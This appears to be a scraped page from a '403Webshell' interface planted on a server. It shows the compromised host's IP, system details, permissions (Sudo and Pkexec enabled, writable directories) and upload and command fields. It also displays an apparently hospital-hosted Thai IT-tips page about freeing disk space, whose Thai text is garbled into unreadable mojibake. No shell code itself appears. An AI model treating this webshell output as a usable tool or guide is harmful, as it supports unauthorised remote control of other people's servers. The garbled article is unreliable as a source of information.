403Webshell
Server IP : 134.236.49.22  /  Your IP : 216.73.216.114
Web Server : Apache/2.2.15 (Fedora)
System : Linux km10.dyndns.org 2.6.31.5-127.fc12.i686.PAE #1 SMP Sat Nov 7 21:25:57 EST 2009 i686
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/Menu Tips IT/menu/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/Menu Tips IT/menu/8 วิธีในการดึงพื้นที่ฮาร์ดดิสก์คืนมา.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<title>Tips Ѻ</title>
<style type="text/css">
<!--
.style11 {font-size: 12px}
.style12 {color: #FF0066}
-->
</style>
</head>

<body>
<!-- Butterfly -->
  
<script language="JavaScript" type="text/javascript">
<!-- Multi Random Movement 2 Script by kurt.grigg@virgin.net

Pic=new Array("http://i123.photobucket.com/albums/o295/lozocat/1bug/two-butterflies-cyan.gif",
"http://i123.photobucket.com/albums/o295/lozocat/1bug/two-butterflies-green.gif",
"http://i123.photobucket.com/albums/o295/lozocat/1bug/two-butterflies-magenta.gif",
"http://i123.photobucket.com/albums/o295/lozocat/1bug/two-butterflies-orange.gif",
"http://i123.photobucket.com/albums/o295/lozocat/1bug/two-butterflies-red.gif",
"http://i123.photobucket.com/albums/o295/lozocat/1bug/two-butterflies-white.gif",
"http://i123.photobucket.com/albums/o295/lozocat/1bug/two-butterflies.gif",
"http://i123.photobucket.com/albums/o295/lozocat/1bug/two-butterflies2.gif",
"http://i123.photobucket.com/albums/o295/lozocat/1bug/two-butterflies-red.gif",
"http://i123.photobucket.com/albums/o295/lozocat/1bug/two-butterflies-white.gif",
"http://i123.photobucket.com/albums/o295/lozocat/1bug/two-butterflies3.gif",
"http://i123.photobucket.com/albums/o295/lozocat/1bug/two-butterflies-yellow.gif")
MaxSpeed=4;
MinSpeed=2;

/************************ Nothing needs altering below ************************/
load = new Array()
for(i=0; i < Pic.length; i++)
{
load[i] = new Image();
load[i].src = Pic[i];
}
n=Pic.length; 
n6=(document.getElementById&&!document.all);
ns=(document.layers);
ie=(document.all);
d=(ns||ie)?'document.':'document.getElementById("';
a=(ns||n6)?'':'all.';
n6r=(n6)?'")':'';
s=(ns)?'':'.style';
if (ns){
for (i=0; i < n; i++)
document.write("<LAYER NAME='pics"+i+"' LEFT=0 TOP=0><img name='netpics' src="+load[i].src+"></LAYER>");
}
if (ie||n6){
for (i=0; i < n; i++)
document.write("<div id='pics"+i+"' style='position:absolute;top:0px;left:0px'><img src="+load[i].src+"></div>");
}
VB=0;
HB=0;
R=new Array();
PB=new Array();
RD=new Array();
Y=new Array();
X=new Array();
D=new Array();
SP=new Array();
BY=new Array();
BX=new Array();
for (i=0; i < n; i++){
Y[i]=10;
X[i]=10;
D[i]=Math.floor(Math.random()*70+10);
SP[i]=Math.floor(Math.random()*MaxSpeed+MinSpeed);
}
function Curve(){
plusMinus=new Array(1,-1,2,-2,3,-3,0,1,-1,0,5,-5)
for (i=0; i < n; i++){
R[i]=Math.floor(Math.random()*plusMinus.length);
RD[i]=plusMinus[R[i]];
}
setTimeout('Curve()',1500);
}
function MoveRandom(){
var H=(ns||n6)?window.innerHeight:document.body.clientHeight;
var W=(ns||n6)?window.innerWidth:document.body.clientWidth;
var YS=(ns||n6)?window.pageYOffset:document.body.scrollTop;
var XS=(ns||n6)?window.pageXOffset:document.body.scrollLeft;
for (i=0; i < n; i++){
BY[i]=-load[i].height;
BX[i]=-load[i].width;
PB[i]=D[i]+=RD[i];
y = SP[i]*Math.sin(PB[i]*Math.PI/180);
x = SP[i]*Math.cos(PB[i]*Math.PI/180);
if (D[i] < 0) D[i]+=360;
Y[i]+=y;
X[i]+=x;
VB=180-D[i];
HB=0-D[i];
//Corner rebounds! not necessary but looks nice.
if ((Y[i] < 1) && (X[i] < 1)) {Y[i]=1;X[i]=1;D[i]=45;}
if ((Y[i] < 1) && (X[i] > W+BX[i])) {Y[i]=1;X[i]=W+BX[i];D[i]=135;}
if ((Y[i] > H+BY[i]) && (X[i] < 1)) {Y[i]=H+BY[i];X[i]=1;D[i]=315;}
if ((Y[i] > H+BY[i]) && (X[i] > W+BX[i])) {Y[i]=H+BY[i];X[i]=W+BX[i];D[i]=225;}
//Edge rebounds!
if (Y[i] < 1) {Y[i]=1;D[i]=HB;} 
if (Y[i] > H+BY[i]) {Y[i]=H+BY[i];D[i]=HB;} 
if (X[i] < 1) {X[i]=1;D[i]=VB;} 
if (X[i] > W+BX[i]) {X[i]=W+BX[i];D[i]=VB;} 
var temp=eval(d+a+"pics"+i+n6r+s);
temp.top=Y[i]+YS;
temp.left=X[i]+XS;
}
setTimeout('MoveRandom()',70);
}
Curve();
MoveRandom();
//-->
</script>                                                              
<!-- End Butterfly -->
<!-- ¹ Ẻù -->
<style> 
<!-- 
a{text-decoration:none} 
//.style55 {font-size: 16}
.style56 {color: #FFFFFF}
.style11 {font-size: 12px}
.style57 {color: #0099FF}
.style58 {color: #FF3333; font-size: 14px; }
.style59 {font-size: 14px}
--> 
</style> 
<SCRIPT language=JavaScript> 
var rate = 20; // Increase amount(The degree of the transmutation) 
var obj; // The object which event occured in 
var act = 0; // Flag during the action 
var elmH = 0; // Hue 
var elmS = 128; // Saturation 
var elmV = 255; // Value 
var clrOrg; // A color before the change 
var TimerID; // Timer ID 
if (navigator.appName.indexOf("Microsoft",0) != -1 && parseInt(navigator.appVersion) >= 4) { 
Browser = true; 
} else { 
Browser = false; 
} 
if (Browser) { 
document.onmouseover = doRainbowAnchor; 
document.onmouseout = stopRainbowAnchor; 
} 
function doRainbow() 
{ 
if (Browser && act != 1) { 
act = 1; 
obj = event.srcElement; 
clrOrg = obj.style.color; 
TimerID = setInterval("ChangeColor()",100); 
} 
} 
function stopRainbow() 
{ 
if (Browser && act != 0) { 
obj.style.color = clrOrg; 
clearInterval(TimerID); 
act = 0; 
} 
} 
function doRainbowAnchor() 
{ 
if (Browser && act != 1) { 
obj = event.srcElement; 
while (obj.tagName != 'A' && obj.tagName != 'BODY') { 
obj = obj.parentElement; 
if (obj.tagName == 'A' || obj.tagName == 'BODY') 
break; 
} 
if (obj.tagName == 'A' && obj.href != '') { 
act = 1; 
clrOrg = obj.style.color; 
TimerID = setInterval("ChangeColor()",100); 
} 
} 
} 
function stopRainbowAnchor() 
{ 
if (Browser && act != 0) { 
if (obj.tagName == 'A') { 
obj.style.color = clrOrg; 
clearInterval(TimerID); 
act = 0; 
} 
} 
} 
function ChangeColor() 
{ 
obj.style.color = makeColor(); 
} 
function makeColor() 
{ 
if (elmS == 0) { 
elmR = elmV; elmG = elmV; elmB = elmV; 
} 
else { 
t1 = elmV; 
t2 = (255 - elmS) * elmV / 255; 
t3 = elmH % 60; 
t3 = (t1 - t2) * t3 / 60; 
if (elmH < 60) { 
elmR = t1; elmB = t2; elmG = t2 + t3; 
} 
else if (elmH < 120) { 
elmG = t1; elmB = t2; elmR = t1 - t3; 
} 
else if (elmH < 180) { 
elmG = t1; elmR = t2; elmB = t2 + t3; 
} 
else if (elmH < 240) { 
elmB = t1; elmR = t2; elmG = t1 - t3; 
} 
else if (elmH < 300) { 
elmB = t1; elmG = t2; elmR = t2 + t3; 
} 
else if (elmH < 360) { 
elmR = t1; elmG = t2; elmB = t1 - t3; 
} 
else { 
elmR = 0; elmG = 0; elmB = 0; 
} 
} 
elmR = Math.floor(elmR); 
elmG = Math.floor(elmG); 
elmB = Math.floor(elmB); 
clrRGB = '#' + elmR.toString(16) + elmG.toString(16) + elmB.toString(16); 
elmH = elmH + rate; 
if (elmH >= 360) 
elmH = 0; 
return clrRGB; 
} 
</SCRIPT>
<!-- ᷡ¹Ẻù-->

<center>
<div align="center"><img src="img/Header.jpg" width="626" height="135" />
  <table width="624" height="297" border="2">
    <tr>
      <td width="34" height="172" bordercolor="#FFFFFF">&nbsp;</td>
      <td width="572" bordercolor="#FFFFFF"><p align="left"><img src="img/head_tips.jpg" width="500" height="100" /></p>
        <p align="left"><span class="style12"><strong>8 Ը㹡ô֧鹷촴ʡ׹ </strong></span><br />
            <br />
          ෤Ԥ˹觷͡óշ Setup Ѻҹͧ Ѵ觾Ԫ ¡繾ԪѺкԺѵԡ ԪѺ Application Ѻ Cache Drive  Temp Drive 㴡繼ҹҹ վ鹷㹡红 һѭԧҾ鹷 촴ʡ仴¢ ѭҨԧ  âҴèѴ÷ҡ 촴ʡͧáèѴ <br />
        óչǶ֧੾㹾Ԫ蹢ͧкԺѵԡ  Application ҹ ǹ ˹բҴԹ 800 亵 жҡõԴ駫Ϳ Application 㹻ҳԹ 1 亵 繡ͧСªҧ ԧ 件֧èѴ÷մ ֧й鹡 鹷 800 亵ͧѧ ˵ع֧º§ Ըէ㹡ôžԪ蹴ѧҴ վ鹷ҧҳ 30 - 50 亵 ͧվ鹷ҧ еͧҧѺᤪͧ Netscape , Internet Explorer , ռҧ E-mail Тŷͧ١ѵѵ㹾Ԫ ǡѺ Application ö¡纵ҧҡ </p>
        <p align="center"><br />
          <img src="img/090410-1.jpg" width="264" height="113" />        </p>
        <p align="left"> <br />
        1. Recycles Bin  ʶҹáþԨóҨѴ Զҡա¹ŧ ҴͧѧШդ 1/10 Ңͧ鹷Ԫ óբͧ촴ʡ 1 ԡ亵 նѧТҴ 100 亵 ҡѴ ѧʹ ¾鹷 100 亵һª </p>
        <p align="center"><br />
          <img src="img/090410-12.jpg" width="368" height="99" /></p>
        <p align="left"> <br />
          2. èѴáѺ Disk Cache ͧ  Netscape , Internet Explorer ʹբͧբҹ Ѵ㹡ôǹŴҡԹ ٢ Offline  ¡鹷촴ʡ ҧդ &quot;ҧᤪ&quot; ¡ѧ Clear Cache ͧҹ óբͧ Netscape  ǹŴҡԹ C:Program FileNetcapecache ǹóբͧ Internet Explorer  C:WindowsTeporary Internet File 鹷㹡ҹҡ 亵仨Ժ 亵 ҡԨóҹź͡ </p>
        <p align="left">3. èѴáѺṺҡѺŤ͹Ԥ ŷǹŴ  Offline Web Browser ѺṺҡѺŤ͹Ԥ Ҩͧҹ ѧҡͧԹâ鹵令 ѴԹҨͧ ź ͹仨Ѵ㹾ԪѺ ǹ HTMLٻҾǹŴ Offline Web Browser ҡͧҧԧ ѧԪѺ蹡ѹ ҡͧź 鹷ҧ鹹 ҡµѴǹáͧ ѺѺҡ e-mail óշҹ Eudora Һҧ좹Ҵ˭ Ѻ Ѻ駵 鹨ж١ ҧա óش ѧ鹨֧õǨͺСӨѴз </p>
        <p align="left">4. ʡ .tmp  C:Windows emp Ǥ (Temporary File)١ҧзҹ Application ҧ ҡҹ¡Դ-Դ ǤǴѧǨж١ѵѵ ҹ 㹡óշԹشӧҹΧ ǤǴѧǨ 繻ҳҡ Ҵ˭ áӨѴٷԵ  Norton Utility | Space Wizard </p>
        <p align="left">5. 駪ǹҹ١Դŧ͵ ԴԹ ѺԹ 觷ź͡ C:Program FileOnline Service ѧࡵ Online Services ҹ鹤 ͧ AT &amp;T , CompuServe, AOL  ԡ÷㹻 ١Դѵѵ յ͡Ҩ͡ԴԴ յ Uninstall ҡѺ Windows  źͧոդ ź ź Windows Explorer ٷԵ㹡 Uninstall  Clean Sweep , Uninstall ÷ǹ鹷ҧ֧ 9 亵 </p>
        <p align="left">6. Application ҡѺԹ ҹ óչõǨͺ͹źҵͧ  Hyper Terminal , Word Pad Thai , Windows Messaging , Paint ,鹷ҧŧա亵蹡ѹ ͡ѧѹ Add/Remove Program  Control Panel </p>
        <p align="left">7. ѺԴкԺѵԡ ŧ촴ʡѧҡԴԹ º 㹺ҧó  Notebook  Toshiba ͫҹ ѡҾѺԹ 95 觶١Դº  ѺԴ駹鹨 C:WindowsOption բҴ 60 - 90 亵 駹ªͧѧ óշԹ öԴ駨ҡǵ鹩Ѻ١Ѵ͡ѧ  ¾鹷촴ʡ ҧդþԨóͧ蹿ͻ ҡ繡ҹ͢ (Workgroup) â;鹷 ͽҡѧ ҡöź öҡͧ йź wowkit.exe բҴ֧ 19 亵͡ ҹѹǡѹ </p>
        <p align="left">8. ˭¶ҷ ҧҨ͢зҨѴҧ  쵡ҧ Eudora , 쵡ҧҡ Offline Browser  Teleport ҨФ鹾 ѹջª ͧ鹷촴ʡ</p>
        <p align="right"><br />
          <span class="style11"><a href="http://www.it.co.th/" target="_blank" class="style12" style="text-decoration: none;"> http://www.it.co.th/</a></span><br />
          </a></p></td>
    </tr>
    <tr bordercolor="#FFFFFF" bgcolor="#000000">
      <td height="115" colspan="2"><embed height="110" type="application/x-shockwave-flash" width="296" src="http://imgfree.21cn.com/free/flash/162.swf" wmode="transparent"></embed>
      <embed height="111" type="application/x-shockwave-flash" width="296" src="http://imgfree.21cn.com/free/flash/162.swf" wmode="transparent"></embed></td>
    </tr>
  </table>
  <img src="img/Header1.jpg" width="624" height="74" /><br>
<img src="img/Footer.png" width="623" height="71" /></div>
<p align="center"><span class="style11">Copyright<img src="../images/logo/copyright.jpg" width="13" height="16" />  2010 Pozedorn@gmail.com sattahip km.10 hospital.</span><br clear="all" />
  <strong> </strong></p>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit